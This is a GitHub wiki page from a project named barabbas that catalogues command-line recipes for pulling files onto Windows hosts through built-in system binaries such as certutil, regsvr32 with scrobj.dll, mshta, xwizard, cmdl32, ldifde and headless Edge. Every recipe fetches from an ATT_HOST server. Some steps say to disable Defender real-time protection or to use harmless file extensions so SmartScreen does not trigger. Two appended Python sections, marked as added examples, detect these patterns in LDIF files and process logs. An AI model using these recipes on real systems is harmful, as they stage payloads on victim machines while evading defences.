DL_ _Win_ _cmd - lighthouseitsecurity/barabbas GitHub Wiki

File Download ➔ Windows ➔ cmd

OVERVIEW:

(identify supported options - Windows - file download - cmd)

@ECHO OFF & ECHO [*] cmd - file download - available options & FOR %i IN (certoc.exe certutil.exe cmdl32.exe ConfigSecurityPolicy.exe cscript.exe curl.exe hh.exe IMEWDBLD.EXE InstallUtil.exe ldifde.exe msedge.exe mshta.exe PresentationHost.exe regsvr32.exe xwizard.exe) DO @ECHO OFF & ECHO    [*] %i & dir /s /b C:\*%i & ECHO. & @ECHO ON

certoc.exe (HTTP; HTTPS)

TESTED ON: Windows Server 2022 (21H2)

NOTES:

  • tool modifies content of downloaded file
    • prepends text to start of file GetCACaps: (
    • appends text to end of file )
    • adds extra newlines
  • seems to work only with text files (not further tested)
    • useful for scenarios which require downloading scripts (e.g. PowerShell)
    • workaround: base64-encode target file ➔ download as text file (containing one line (b64 string)) ➔ base64-decode it
  • HTTPS NOT working with self-signed X.509 certificate (importing to certificate store not working; not further analyzed)

(HTTP/HTTPS)

1. [SERVER] base64-encode target file

export LFILE="testfile_10KB";
cat $LFILE | base64 -w0 > ${LFILE}.b64;

2. [CLIENT] open cmd session

(open command prompt)

3. [CLIENT] specify file transfer parameters

set ATT_HOST=192.168.5.11
set ATT_PORT=80
set ATT_PATH=/
set RFILE=testfile_10KB

4. [CLIENT] download base64-encoded file

certoc.exe -GetCACAPS http://%ATT_HOST%:%ATT_PORT%/%RFILE%.b64 >> %CD%\%RFILE%.b64

NOTE: if using HTTPS, replace http with https

5. [CLIENT] base64-decode file

(remove added code (prepended; appended))

certutil.exe -decode %CD%\%RFILE%.b64 %CD%\%RFILE%
del %CD%\%RFILE%.b64 && certutil.exe -hashfile %CD%\%RFILE% MD5

certutil.exe (HTTP; HTTPS)

https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil

TESTED ON: Windows 10 (22H2)

NOTES:

  • HTTPS working with self-signed X.509 certificate
    • install certificate in certificate store, under Current User -> Trusted Root Certification Authorities
    • its Common Name field must contain either:
      • DNS resolvable hostname
      • IP address of web server
  • upon download, tool will output an error which can be ignored (i.e. file intact)

(HTTP/HTTPS)

1. [CLIENT] open cmd session

(open command prompt)

2. [CLIENT] specify file transfer parameters

set ATT_HOST=192.168.5.11
set ATT_PORT=80
set ATT_PATH=/
set RFILE=testfile_10MB

3. [CLIENT] download file

certutil.exe -urlcache -f http://%ATT_HOST%:%ATT_PORT%/%RFILE% %CD%\%RFILE% && certutil.exe -hashfile %CD%\%RFILE% MD5

NOTE: if using HTTPS, replace http with https

cmdl32.exe (HTTP; HTTPS)

TESTED ON: Windows 10 (22H2); Windows Server 2022 (21H2)

NOTES:

  • target file location specified as value of UpdateUrl parameter in configuration file (e.g. UpdateUrl=https://getsamplefiles.com/download/txt/sample-1.txt)
  • downloaded file will be stored in %TMP% (changed to newly created/current directory), as VPNXXXX.tmp (X = random number or letter)
  • HTTPS NOT working with self-signed X.509 certificate (importing to certificate store not working; not further analyzed)

(HTTP)

1. [CLIENT] open cmd session

(open command prompt)

2. [CLIENT] specify file transfer parameters

set ATT_HOST=192.168.5.11
set ATT_PORT=80
set ATT_PATH=/
set RFILE=testfile_200MB

3. [CLIENT] create download directory

mkdir download && cd download
icacls.exe %CD% /deny %USERNAME%:(OI)(CI)(DE,DC)

4. [CLIENT] create configuration file (named config)

ECHO [Connection Manager] > config
ECHO CMSFile=config >> config
ECHO ServiceName=WindowsUpdate >> config
ECHO TunnelFile=config >> config
ECHO [Settings] >> config
ECHO UpdateUrl=http://%ATT_HOST%:%ATT_PORT%/%RFILE% >> config

NOTE: if using HTTPS, replace http with https

5. [CLIENT] download file

set TMP=%CD% && cmdl32.exe /vpn /lan %CD%\config

(wait for file to download)

dir /b VPN* > fn.txt && set /p LFILE=<fn.txt
certutil.exe -hashfile %LFILE% MD5

6. [CLIENT] cleanup

icacls.exe %TMP% /grant %USERNAME%:(OI)(CI)(DE,DC) && del /s /q *.* && cd .. && rmdir /s /q download
icacls.exe %CD% /grant %USERNAME%:(OI)(CI)(DE,DC)

ConfigSecurityPolicy.exe (HTTP; HTTPS)

TESTED ON: Windows 10 (22H2)

(HTTP/HTTPS)

1. [CLIENT] open cmd session

(open command prompt)

2. [CLIENT] specify file transfer parameters

set ATT_HOST=192.168.5.11
set ATT_PORT=80
set ATT_PATH=/
set RFILE=testfile_200MB

3. [CLIENT] download file

"C:\Program Files\Windows Defender\ConfigSecurityPolicy.exe" http://%ATT_HOST%:%ATT_PORT%/%RFILE%

NOTE: if using HTTPS, replace http with https

(wait for file to download)

4. [CLIENT] move target file to current directory

if /I "%RFILE:.=%" neq "%RFILE%" (for /f "tokens=1 delims=." %a in ("%RFILE%") do (echo %a) > fn.txt) else (echo %RFILE% > fn.txt)
set /p FN=<fn.txt && del fn.txt && dir /s /b %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\ | findstr /r "%FN%" > fnp.txt
set /p FNP=<fnp.txt && del fnp.txt
move %FNP% %CD%\%RFILE%
certutil.exe -hashfile %CD%\%RFILE% MD5

NOTES:

  • downloaded file saved in %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\<RANDOM-8-CHAR-DIRECTORY>
  • HTTPS NOT working with self-signed X.509 certificate (importing to certificate store not working; not further analyzed)

cscript.exe (HTTP; HTTPS)

https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/cscript

TESTED ON: Windows 10 (22H2); Windows Server 2022 (21H2)

NOTES:

  • support for various scripting languages:
    • JavaScript
    • VBScript
    • etc (not further analyzed)
  • HTTPS working with self-signed X.509 certificate
    • install certificate in certificate store, under Current User -> Trusted Root Certification Authorities
    • its Common Name field must contain either:
      • DNS resolvable hostname
      • IP address of web server

(JavaScript - HTTP/HTTPS)

1. [CLIENT] open cmd session

(open command prompt)

2. [CLIENT] specify file transfer parameters

set ATT_HOST=192.168.5.11
set ATT_PORT=80
set ATT_PATH=/
set RFILE=testfile_200MB

3. [CLIENT] create download script

echo var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); > wget.js
echo WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false); >> wget.js
echo WinHttpReq.Send(); >> wget.js
echo BinStream = new ActiveXObject("ADODB.Stream"); >> wget.js
echo BinStream.Type = 1; >> wget.js
echo BinStream.Open(); >> wget.js
echo BinStream.Write(WinHttpReq.ResponseBody); >> wget.js
echo BinStream.SaveToFile(WScript.Arguments(1)); >> wget.js

4. [CLIENT] download file

cscript.exe wget.js http://%ATT_HOST%:%ATT_PORT%/%RFILE% %CD%\%RFILE%
certutil.exe -hashfile %CD%\%RFILE% MD5

NOTE: if using HTTPS, replace http with https

(VBScript - HTTP/HTTPS)

1. [CLIENT] open cmd session

(open command prompt)

2. [CLIENT] specify file transfer parameters

set ATT_HOST=192.168.5.11
set ATT_PORT=80
set ATT_PATH=/
set RFILE=testfile_200KB

3. [CLIENT] create download script

echo strUrl = WScript.Arguments.Item(0) > wget.vbs 
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs 
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs 
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs 
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs 
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs 
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs 
echo Err.Clear >> wget.vbs 
echo Set http = Nothing >> wget.vbs 
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs 
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs 
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs 
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs 
echo http.Open "GET", strURL, False >> wget.vbs 
echo http.Send >> wget.vbs 
echo varByteArray = http.ResponseBody >> wget.vbs 
echo Set http = Nothing >> wget.vbs 
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs 
echo strData = "" >> wget.vbs 
echo strBuffer = "" >> wget.vbs 
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs 
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs 
echo Next >> wget.vbs 
echo ts.Close >> wget.vbs

4. [CLIENT] download file

cscript.exe wget.vbs http://%ATT_HOST%:%ATT_PORT%/%RFILE% %CD%\%RFILE%
certutil.exe -hashfile %CD%\%RFILE% MD5

NOTE: if using HTTPS, replace http with https

curl.exe (HTTP; HTTPS)

https://learn.microsoft.com/en-us/virtualization/community/team-blog/2017/20171219-tar-and-curl-come-to-windows

TESTED ON: Windows 10 (22H2); Windows Server 2022 (21H2)

NOTE: HTTPS working with self-signed X.509 certificate

  • install certificate in certificate store, under Current User -> Trusted Root Certification Authorities
  • its Common Name field must contain either:
    • DNS resolvable hostname
    • IP address of web server

(HTTP/HTTPS)

1. [CLIENT] open cmd session

(open command prompt)

2. [CLIENT] specify file transfer parameters

set ATT_HOST=192.168.5.11
set ATT_PORT=80
set ATT_PATH=/
set RFILE=testfile_200MB

3. [CLIENT] download file

curl.exe http://%ATT_HOST%:%ATT_PORT%/%RFILE% -o %CD%\%RFILE%
certutil.exe -hashfile %CD%\%RFILE% MD5

NOTE: if using HTTPS, replace http with https

hh.exe (HTTP)

TESTED ON: Windows 10 (22H2); Windows Server 2022 (21H2)

NOTE: HTTPS does not seem to work (unrelated to validity of X.509 certificate; not further analyzed)

(HTTP)

1. [CLIENT] open cmd session

(open command prompt)

2. [CLIENT] specify file transfer parameters

set ATT_HOST=192.168.5.11
set ATT_PORT=80
set ATT_PATH=/
set RFILE=testfile_200MB

3. [CLIENT] download file

hh.exe http://%ATT_HOST%:%ATT_PORT%/%RFILE%

(save file to current directory)

certutil.exe -hashfile %CD%\%RFILE% MD5

NOTE: two popup windows appear:

  • HTML Help
    • do not close
  • File Download dialog
    • select where to save file and confirm download
      • close both windows upon completion

IMEWDBLD.EXE (HTTP)

TESTED ON: Windows 10 (22H2); Windows Server 2022 (21H2)

NOTES:

  • upon download, an error popup window will appear, which can be ignored (i.e. file successfully downloaded)
  • downloaded file saved in one of following directories:
    • %LOCALAPPDATA%\Microsoft\Windows\INetCache\<RANDOM-8-CHAR-DIRECTORY>
    • %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\<RANDOM-8-CHAR-DIRECTORY>
  • HTTPS does not seem to work (unrelated to validity of X.509 certificate; not further analyzed)

(HTTP)

1. [CLIENT] open cmd session

(open command prompt)

2. [CLIENT] specify file transfer parameters

set ATT_HOST=192.168.5.11
set ATT_PORT=80
set ATT_PATH=/
set RFILE=testfile_200MB

3. [CLIENT] download file

C:\Windows\System32\IME\SHARED\IMEWDBLD.EXE http://%ATT_HOST%:%ATT_PORT%/%RFILE%

(wait for file to download)

4. [CLIENT] move target file to current directory

if /I "%RFILE:.=%" neq "%RFILE%" (for /f "tokens=1 delims=." %a in ("%RFILE%") do (echo %a) > fn.txt) else (echo %RFILE% > fn.txt)
set /p FN=<fn.txt && del fn.txt && dir /s /b %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\ | findstr /r "%FN%" > fnp.txt
set /p FNP=<fnp.txt && del fnp.txt
move %FNP% %CD%\%RFILE%
certutil.exe -hashfile %CD%\%RFILE% MD5

InstallUtil.exe (HTTP)

https://learn.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool

TESTED ON: Windows 10 (22H2); Windows Server 2022 (21H2)

NOTES:

  • upon download, an error popup window will appear, which can be ignored (i.e. file successfully downloaded)
  • downloaded file saved in %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\<RANDOM-8-CHAR-DIRECTORY>
  • HTTPS does not seem to work (unrelated to validity of X.509 certificate; not further analyzed)

(HTTP)

1. [CLIENT] open cmd session

(open command prompt)

2. [CLIENT] specify file transfer parameters

set ATT_HOST=192.168.5.11
set ATT_PORT=80
set ATT_PATH=/
set RFILE=testfile_200MB

3. [CLIENT] download file

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe http://%ATT_HOST%:%ATT_PORT%/%RFILE%

(wait for file to download)

4. [CLIENT] move target file to current directory

if /I "%RFILE:.=%" neq "%RFILE%" (for /f "tokens=1 delims=." %a in ("%RFILE%") do (echo %a) > fn.txt) else (echo %RFILE% > fn.txt)
set /p FN=<fn.txt && del fn.txt && dir /s /b %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\ | findstr /r "%FN%" > fnp.txt
set /p FNP=<fnp.txt && del fnp.txt
move %FNP% %CD%\%RFILE%
certutil.exe -hashfile %CD%\%RFILE% MD5

ldifde.exe (HTTP)

https://krypted.com/active-directory/export-ad-objects-into-ldif-on-windows-server/

https://adamtheautomator.com/csvde/

TESTED ON: Windows Server 2022 (21H2; AD Domain Services role)

NOTES:

  • target OS requirements:
    • Server: AD Domain Services role
    • Desktop: AD LDS role
  • modifies running Active Directory configuration - DO NOT USE IN PRODUCTION ENVIRONMENT
    • saves downloaded file (base64-encoded) under specified attribute (thumbnailPhoto used here) of specified AD object (CN=Guest,CN=Users,DC=TECH,DC=LOCAL used here)
  • will not work if configuration file (config.ldf) structure not correct
    • no space between : and < characters under thumbnailPhoto attribute
    • not ended with - character
  • also possible to use other attributes (e.g. jpegphoto; replace all instances of thumbnailPhoto in configuration file)
  • upon download, an error popup window will appear, which can be ignored (i.e. file successfully downloaded)
  • downloaded file saved in C:\Users\%USERNAME%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\<RANDOM-8-CHAR-DIRECTORY>
  • HTTPS does not seem to work (unrelated to validity of X.509 certificate; not further analyzed)

(HTTP)

1. [CLIENT] open cmd session

(open command prompt)

2. [CLIENT] specify file transfer parameters

set ATT_HOST=192.168.5.11
set ATT_PORT=80
set ATT_PATH=/
set RFILE=testfile_200MB

3. [CLIENT] export all objects from Active Directory

ldifde.exe -f ADExport.ldf

4. [CLIENT] analyze exported objects/find suitable AD object (e.g. domain user account)

type ADExport.ldf | findstr.exe /c:"dn: CN=Guest,"

5. [CLIENT] create LDF configuration file (named config.ldf)

ECHO dn: CN=Guest,CN=Users,DC=TECH,DC=LOCAL > config.ldf
ECHO changetype: modify >> config.ldf
ECHO replace: thumbnailPhoto >> config.ldf
ECHO thumbnailPhoto:^< http://%ATT_HOST%:%ATT_PORT%/%RFILE% >> config.ldf
ECHO - >> config.ldf

NOTE: modify values as required

6. [CLIENT] update running Active Directory configuration with specified changes - download file

ldifde.exe -i -f config.ldf

(wait for file to download)

7. [CLIENT] move target file to current directory

if /I "%RFILE:.=%" neq "%RFILE%" (for /f "tokens=1 delims=." %a in ("%RFILE%") do (echo %a) > fn.txt) else (echo %RFILE% > fn.txt)
set /p FN=<fn.txt && del fn.txt && dir /s /b %LOCALAPPDATA%\Microsoft\Windows\INetCache\ | findstr /r "%FN%" > fnp.txt
set /p FNP=<fnp.txt && del fnp.txt
move %FNP% %CD%\%RFILE%
certutil.exe -hashfile %CD%\%RFILE% MD5

8. [CLIENT] cleanup - update config file (named config.ldf)

ECHO dn: CN=Guest,CN=Users,DC=TECH,DC=LOCAL > config.ldf
ECHO changetype: modify >> config.ldf
ECHO delete: thumbnailPhoto >> config.ldf
ECHO - >> config.ldf

NOTE: modify values as required

9. [CLIENT] cleanup - update running Active Directory configuration with specified changes - revert changes

ldifde.exe -i -f config.ldf

10. [CLIENT] cleanup - confirm changes

ldifde.exe -f ADExport.ldf
type ADExport.ldf | findstr.exe /c:"thumbnailPhoto"
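
For reviewing .ldf files found on a host, the scanner below is an added example (not part of the original wiki or the barabbas project). It flags LDIF records whose attribute value is loaded from a remote URL via the `attr:< url` form that config.ldf uses; RFC 2849 shows this form with file:// URLs, so an http(s) target stands out. The sample LDIF, the 192.0.2.10 address, the CN=Alice entry and all function names are constructed for illustration.

```python
import re

# RFC 2849 value-spec "attr:< url": the value is read from the given URL.
URL_VALUE = re.compile(r"^([A-Za-z][\w;.-]*):<\s*(\S+)")


def unfold(text):
    """Join RFC 2849 continuation lines (lines starting with one space)."""
    lines = []
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    # Comments are dropped only after unfolding, since they can be folded too.
    return [line for line in lines if not line.startswith("#")]


def records(text):
    """Yield each LDIF record as a list of unfolded lines."""
    rec = []
    for line in unfold(text):
        if line.strip():
            rec.append(line.rstrip())  # ECHO ... > file leaves trailing spaces
        elif rec:
            yield rec
            rec = []
    if rec:
        yield rec


def find_remote_values(text):
    """Return (dn, changetype, attribute, url) for each http(s) URL value."""
    findings = []
    for rec in records(text):
        dn = changetype = None
        for line in rec:
            low = line.lower()
            if low.startswith("dn:"):
                dn = line[3:].strip()  # base64 "dn::" values are not decoded
            elif low.startswith("changetype:"):
                changetype = line[11:].strip().lower()
            else:
                m = URL_VALUE.match(line)
                if m and m.group(2).lower().startswith(("http://", "https://")):
                    findings.append((dn, changetype, m.group(1), m.group(2)))
    return findings


# Constructed sample: one record shaped like the page's config.ldf (with a
# folded URL line), and one ordinary record that loads a local photo.
SAMPLE_LDIF = """\
dn: CN=Guest,CN=Users,DC=TECH,DC=LOCAL
changetype: modify
replace: thumbnailPhoto
thumbnailPhoto:< http://192.0.2.10:80/test
 file_10KB
-

dn: CN=Alice,CN=Users,DC=TECH,DC=LOCAL
changetype: modify
replace: jpegPhoto
jpegPhoto:< file:///C:/photos/alice.jpg
-
"""

if __name__ == "__main__":
    for finding in find_remote_values(SAMPLE_LDIF):
        print(finding)
```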

ms-appinstaller protocol (HTTP; HTTPS)

TESTED ON: Windows 10 (22H2)

(HTTP/HTTPS)

1. [CLIENT] open cmd session

(open command prompt)

2. [CLIENT] specify file transfer parameters

set ATT_HOST=192.168.5.11
set ATT_PORT=80
set ATT_PATH=/
set RFILE=testfile_10KB

3. [CLIENT] download file

start ms-appinstaller://?source=http://%ATT_HOST%:%ATT_PORT%/%RFILE%

NOTE: if using HTTPS, replace http with https

(wait for file to download; do NOT close popup window until instructed)

4. [CLIENT] move target file to current directory

if /I "%RFILE:.=%" neq "%RFILE%" (for /f "tokens=1 delims=." %a in ("%RFILE%") do (echo %a) > fn.txt) else (echo %RFILE% > fn.txt)
set /p FN=<fn.txt && del fn.txt && dir /s /b C:\Users\%USERNAME%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\ | findstr /r "%FN%" > fnp.txt
set /p FNP=<fnp.txt && del fnp.txt
move %FNP% %CD%\%RFILE%
certutil.exe -hashfile %CD%\%RFILE% MD5

(close popup window)

msedge.exe (HTTP; HTTPS)

TESTED ON: Windows 10 (22H2); Windows Server 2022 (21H2)

(with Edge GUI popup - HTTP/HTTPS)

1. [CLIENT] open cmd session

(open command prompt)

2. [CLIENT] specify file transfer parameters

set ATT_HOST=192.168.5.11
set ATT_PORT=80
set ATT_PATH=/
set RFILE=testfile_200MB

3. [CLIENT] download file

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" http://%ATT_HOST%:%ATT_PORT%/%RFILE%

(move file from download directory to current directory)

certutil.exe -hashfile %CD%\%RFILE% MD5

NOTES:

  • if using HTTPS, replace http with https
  • Edge will pop up and download the file
    • file will be downloaded to Edge's download directory
  • to avoid SmartScreen triggering, use harmless file extension (e.g. .txt, .zip; not further tested)
  • HTTPS working with self-signed X.509 certificate (accept it when Edge pops up)

(without Edge GUI - HTTP/HTTPS)

1. [SERVER] base64-encode target file

export LFILE="testfile_10MB";
cat $LFILE | base64 -w0 > ${LFILE}.b64.html;

2. [CLIENT] open cmd session

(open command prompt)

3. [CLIENT] specify file transfer parameters

set ATT_HOST=192.168.5.11
set ATT_PORT=80
set ATT_PATH=/
set RFILE=testfile_10MB

4. [CLIENT] download base64-encoded file

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --headless --enable-logging --disable-gpu --dump-dom http://%ATT_HOST%:%ATT_PORT%/%RFILE%.b64.html > %CD%\%RFILE%.b64.html

NOTES:

  • if using HTTPS, replace http with https
  • append .html extension to target file
    • base64-encode binaries

5. [CLIENT] base64-decode file

(remove added HTML code (prepended; appended))

certutil.exe -decode %CD%\%RFILE%.b64.html %CD%\%RFILE%
del %CD%\%RFILE%.b64.html && certutil.exe -hashfile %CD%\%RFILE% MD5

NOTES:

  • Edge will silently download the file
    • no Edge GUI popup window
    • file will be downloaded to current directory
  • HTTPS working with self-signed X.509 certificate
    • install certificate in certificate store, under Current User -> Trusted Root Certification Authorities
    • its Common Name field must contain either:
      • DNS resolvable hostname
      • IP address of web server

mshta.exe (HTTP; HTTPS)

TESTED ON: Windows 10 (22H2); Windows Server 2022 (21H2)

NOTES:

  • upon downloading, file's content will be displayed in notepad (popup window)
    • possible to save file manually
  • downloaded file saved in %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\<RANDOM-8-CHAR-DIRECTORY>
    • inconsistent with HTTPS (i.e. sometimes not saved; not further analyzed)
      • possible to save file via notepad popup window
  • HTTPS working with self-signed X.509 certificate (security alert window will popup; accept certificate)

(HTTP/HTTPS)

1. [CLIENT] open cmd session

(open command prompt)

2. [CLIENT] specify file transfer parameters

set ATT_HOST=192.168.5.11
set ATT_PORT=80
set ATT_PATH=/
set RFILE=testfile_200MB

3. [CLIENT] download file

mshta.exe http://%ATT_HOST%:%ATT_PORT%/%RFILE%

NOTE: if using HTTPS, replace http with https

(wait for file to download)

4. [CLIENT] move target file to current directory

if /I "%RFILE:.=%" neq "%RFILE%" (for /f "tokens=1 delims=." %a in ("%RFILE%") do (echo %a) > fn.txt) else (echo %RFILE% > fn.txt)
set /p FN=<fn.txt && del fn.txt && dir /s /b %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\ | findstr /r "%FN%" > fnp.txt
set /p FNP=<fnp.txt && del fnp.txt
move %FNP% %CD%\%RFILE%
certutil.exe -hashfile %CD%\%RFILE% MD5

PresentationHost.exe (HTTP; HTTPS)

https://learn.microsoft.com/en-us/dotnet/desktop/wpf/app-development/wpf-host-presentationhost-exe

TESTED ON: Windows 10 (22H2); Windows Server 2022 (21H2)

NOTES:

  • multiple popup windows appear (related to Internet Explorer/Edge)
  • depending on the download scenario, downloaded file saved in one of following directories:
    • Edge's download directory
    • Internet Explorer's download directory
    • somewhere within %LOCALAPPDATA%\Microsoft\Windows\INetCache\
  • Internet Explorer process may hang
    • manually end all iexplore.exe processes
  • HTTPS working with self-signed X.509 certificate (accept it when Edge pops up)

(HTTP/HTTPS)

1. [CLIENT] open cmd session

(open command prompt)

2. [CLIENT] specify file transfer parameters

set ATT_HOST=192.168.5.11
set ATT_PORT=80
set ATT_PATH=/
set RFILE=testfile_200MB

3. [CLIENT] download file

PresentationHost.exe http://%ATT_HOST%:%ATT_PORT%/%RFILE%

(wait for file to download)

NOTE: if using HTTPS, replace http with https

4. [CLIENT] move target file to current directory

(move file from download directory to current directory)

certutil.exe -hashfile %CD%\%RFILE% MD5

regsvr32.exe (HTTP; HTTPS)

https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/regsvr32

TESTED ON: Windows 10 (22H2); Windows Server 2022 (21H2)

NOTES:

  • upon download, an error popup window will appear, which can be ignored (i.e. file successfully downloaded)
  • avoid downloading text files (appends some characters to file)
  • Windows Defender Antivirus' Real-time protection may block the download
    • if so, disable it
  • HTTPS working with self-signed X.509 certificate
    • install certificate in certificate store, under Current User -> Trusted Root Certification Authorities
    • its Common Name field must contain either:
      • DNS resolvable hostname
      • IP address of web server

(HTTP/HTTPS)

1. [CLIENT] open cmd session

(open command prompt)

2. [CLIENT] specify file transfer parameters

set ATT_HOST=192.168.5.11
set ATT_PORT=80
set ATT_PATH=/
set RFILE=testfile_200MB

3. [CLIENT] disable Windows Defender Antivirus' Real-time protection

4. [CLIENT] download file

regsvr32.exe /u /n /s /i:http://%ATT_HOST%:%ATT_PORT%/%RFILE% scrobj.dll

NOTE: if using HTTPS, replace http with https

(wait for file to download)

5. [CLIENT] move target file to current directory

if /I "%RFILE:.=%" neq "%RFILE%" (for /f "tokens=1 delims=." %a in ("%RFILE%") do (echo %a) > fn.txt) else (echo %RFILE% > fn.txt)
set /p FN=<fn.txt && del fn.txt && dir /s /b %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\ | findstr /r "%FN%" > fnp.txt
set /p FNP=<fnp.txt && del fnp.txt
move %FNP% %CD%\%RFILE%
certutil.exe -hashfile %CD%\%RFILE% MD5

xwizard.exe (HTTP; HTTPS)

TESTED ON: Windows 10 (22H2); Windows Server 2022 (21H2)

NOTES:

  • upon download, an error popup window will appear, which can be ignored (i.e. file successfully downloaded)
  • HTTPS NOT working with self-signed X.509 certificate (importing to certificate store not working; not further analyzed)

(HTTP/HTTPS)

1. [CLIENT] open cmd session

(open command prompt)

2. [CLIENT] specify file transfer parameters

set ATT_HOST=192.168.5.11
set ATT_PORT=80
set ATT_PATH=/
set RFILE=testfile_200MB

3. [CLIENT] download file

xwizard.exe RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /z http://%ATT_HOST%:%ATT_PORT%/%RFILE%

NOTE: if using HTTPS, replace http with https

(wait for file to download)

4. [CLIENT] move target file to current directory

if /I "%RFILE:.=%" neq "%RFILE%" (for /f "tokens=1 delims=." %a in ("%RFILE%") do (echo %a) > fn.txt) else (echo %RFILE% > fn.txt)
set /p FN=<fn.txt && del fn.txt && dir /s /b %LOCALAPPDATA%\Microsoft\Windows\INetCache\ | findstr /r "%FN%" > fnp.txt
set /p FNP=<fnp.txt && del fnp.txt
move %FNP% %CD%\%RFILE%
certutil.exe -hashfile %CD%\%RFILE% MD5
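
From the monitoring side, the commands on this page leave recognisable process command lines. The following is an added example (not part of the original wiki or the barabbas project) that classifies process-creation events against the argument patterns shown above. The event field names follow Sysmon Event ID 1 (Image, CommandLine); the rule names, sample events and the 192.0.2.10 address are constructed for illustration.

```python
import ntpath
import re

# Binaries from this page's overview command, lower-cased for matching.
DOWNLOAD_BINARIES = {
    "certoc.exe", "certutil.exe", "cmdl32.exe", "configsecuritypolicy.exe",
    "cscript.exe", "curl.exe", "hh.exe", "imewdbld.exe", "installutil.exe",
    "ldifde.exe", "msedge.exe", "mshta.exe", "presentationhost.exe",
    "regsvr32.exe", "xwizard.exe",
}
# A browser started with a URL is normal, so msedge.exe is matched only by
# its headless rule below, not by the generic URL rule.
GENERIC_EXCLUDED = {"msedge.exe"}
URL = re.compile(r"https?://", re.I)
APPINSTALLER_URI = re.compile(r'ms-appinstaller:[^\s"]*source=https?://', re.I)

# Argument patterns copied from the commands on this page. Some fire without
# a URL on the command line (cmdl32 reads UpdateUrl from its config file).
SPECIFIC = {
    "certutil.exe": ("certutil-urlcache", r"[-/]urlcache\b"),
    "certoc.exe": ("certoc-getcacaps", r"[-/]GetCACAPS\b"),
    "cmdl32.exe": ("cmdl32-vpn-lan", r"/vpn\b.*?/lan\b"),
    "regsvr32.exe": ("regsvr32-remote-scrobj", r"/i:https?://.*scrobj\.dll"),
    "xwizard.exe": ("xwizard-runwizard-url", r"RunWizard\b.*?/z\s*https?://"),
    "msedge.exe": ("msedge-headless-dump-dom", r"--headless\b.*--dump-dom\b"),
}


def classify(event):
    """Return the sorted rule names that fire for one process event."""
    image = ntpath.basename(event["Image"]).lower()
    cmdline = event["CommandLine"]
    hits = set()
    if APPINSTALLER_URI.search(cmdline):
        hits.add("ms-appinstaller-source-url")
    if image in DOWNLOAD_BINARIES:
        if image not in GENERIC_EXCLUDED and URL.search(cmdline):
            hits.add("lolbin-with-url")
        if image in SPECIFIC:
            name, pattern = SPECIFIC[image]
            if re.search(pattern, cmdline, re.I):
                hits.add(name)
    return sorted(hits)


def scan(events):
    """Return (index, rule names) for every event where a rule fires."""
    return [(i, hits) for i, e in enumerate(events) if (hits := classify(e))]


def ev(image, cmdline):
    return {"Image": image, "CommandLine": cmdline}


# Constructed sample events; none of these values come from real logs.
SAMPLE_EVENTS = [
    ev(r"C:\Windows\System32\certutil.exe",
       r"certutil.exe -urlcache -f http://192.0.2.10:80/testfile C:\Users\u\testfile"),
    ev(r"C:\Windows\System32\certutil.exe",
       r"certutil.exe -hashfile C:\Users\u\testfile MD5"),
    ev(r"C:\Windows\System32\cmdl32.exe",
       r"cmdl32.exe /vpn /lan C:\Users\u\download\config"),
    ev(r"C:\Windows\System32\regsvr32.exe",
       r"regsvr32.exe /u /n /s /i:http://192.0.2.10:80/testfile scrobj.dll"),
    ev(r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
       r'"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://example.com/'),
    ev(r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
       r"msedge.exe --headless --enable-logging --disable-gpu --dump-dom http://192.0.2.10/testfile.b64.html"),
    ev(r"C:\Windows\System32\cmd.exe",
       r"cmd.exe /c start ms-appinstaller://?source=http://192.0.2.10/testfile"),
]

if __name__ == "__main__":
    for i, hits in scan(SAMPLE_EVENTS):
        print(i, SAMPLE_EVENTS[i]["CommandLine"], "->", hits)
```

The generic lolbin-with-url rule also matches routine curl.exe use, so it is better treated as context for the tool-specific rules than as an alert on its own.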
